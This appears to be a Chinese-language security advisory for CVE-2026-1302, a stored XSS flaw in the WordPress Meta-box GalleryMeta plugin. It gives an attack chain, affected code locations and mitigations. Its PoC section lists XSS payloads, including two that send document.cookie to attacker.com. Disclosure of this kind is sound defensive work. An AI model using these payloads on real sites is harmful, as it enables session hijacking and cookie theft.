CVE-2026-1302 WordPress Meta-box GalleryMeta插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2026-1302

漏洞类型

存储型跨站脚本攻击(Stored XSS)

CVSS评分

4.4 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Meta-box GalleryMeta plugin for WordPress

漏洞概述

CVE-2026-1302是WordPress插件Meta-box GalleryMeta中的一个存储型跨站脚本(XSS)漏洞。该漏洞存在于插件的admin settings功能中，影响版本从早期版本一直到3.0.1。由于插件在处理用户输入时未进行充分的输入清理和输出转义，攻击者可以在页面上注入任意Web脚本。攻击者需要拥有编辑者级别(editor-level)或更高的权限才能利用此漏洞。成功利用后，恶意脚本将在任何访问被注入页面的用户浏览器中执行，可能导致会话劫持、敏感信息窃取或进一步的攻击。该漏洞仅影响多站点(Multi-site)WordPress安装和禁用了unfiltered_html功能的安装环境。CVSS 3.1评分4.4，属于中等严重程度，攻击复杂度较高但不需要用户交互。

技术细节

该漏洞的根本原因在于Meta-box GalleryMeta插件(版本<=3.0.1)在管理后台设置页面中缺乏适当的输入验证和输出编码。攻击者通过以下方式利用此漏洞：1) 使用具有编辑者权限的账户登录WordPress后台；2) 导航到插件设置页面；3) 在设置字段中注入恶意JavaScript代码，如<script>alert(document.cookie)</script>；4) 保存设置后，由于缺乏输出转义，恶意代码会被存储在数据库中；5) 当其他用户访问包含该设置的页面时，恶意脚本会在其浏览器上下文中执行。根据漏洞代码分析，问题出现在gallerymetaboxes.php的第119行和314行，以及模板文件single-mb_gallery.php的第31和33行，这些位置未对用户输入进行sanitization和escaping处理。攻击者可通过存储型XSS窃取管理员Cookie、劫持会话或进行进一步的攻击。

攻击链分析

STEP 1

Reconnaissance

攻击者识别目标网站使用WordPress CMS，并确认安装了Meta-box GalleryMeta插件版本<=3.0.1

STEP 2

Authentication

攻击者获取WordPress账户凭据，需要至少具有编辑者(Editor)权限或更高权限

STEP 3

Payload Injection

通过WordPress管理后台访问Meta-box GalleryMeta插件设置页面，在设置字段中注入恶意JavaScript代码

STEP 4

Persistence

恶意代码被存储在WordPress数据库中，由于缺乏输入清理和输出转义，代码永久保存在服务器端

STEP 5

Trigger

当其他用户访问包含注入代码的页面时，浏览器会执行存储的恶意脚本

STEP 6

Impact

成功执行后可窃取用户Cookie、会话令牌，进行会话劫持或进一步横向移动攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2026-1302 PoC: Stored XSS in Meta-box GalleryMeta Plugin -->
<!-- This PoC demonstrates the stored XSS vulnerability in WordPress Meta-box GalleryMeta plugin -->
<!-- Requirements: Editor-level or higher privileges -->

<!-- Step 1: Login to WordPress admin panel with editor+ privileges -->
<!-- Step 2: Navigate to Meta-box Gallery settings page -->
<!-- Step 3: Inject XSS payload in any settings field -->

<!-- XSS Payload Examples: -->
<script>alert('XSS Vulnerability - CVE-2026-1302')</script>

<!-- Cookie stealing payload -->
<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>

<!-- Session hijacking payload -->
<img src=x onerror="fetch('https://attacker.com/log?data='+document.cookie)">

<!-- Stored XSS in gallery settings -->
<svg/onload=alert(document.domain)>

影响范围

Meta-box GalleryMeta plugin for WordPress <= 3.0.1

防御指南

临时缓解措施

如果无法立即升级插件，可采取以下临时缓解措施：1) 在wp-config.php中启用DISALLOW_UNFILTERED_HTML常量(注意：这可能影响部分功能)；2) 使用WordPress安全插件如Wordfence或Sucuri进行实时监控和防护；3) 限制具有编辑权限的用户账户，定期审查用户列表；4) 实施严格的CSP策略以减少XSS漏洞的影响；5) 对管理后台实施双因素认证；6) 监控日志中的异常请求模式。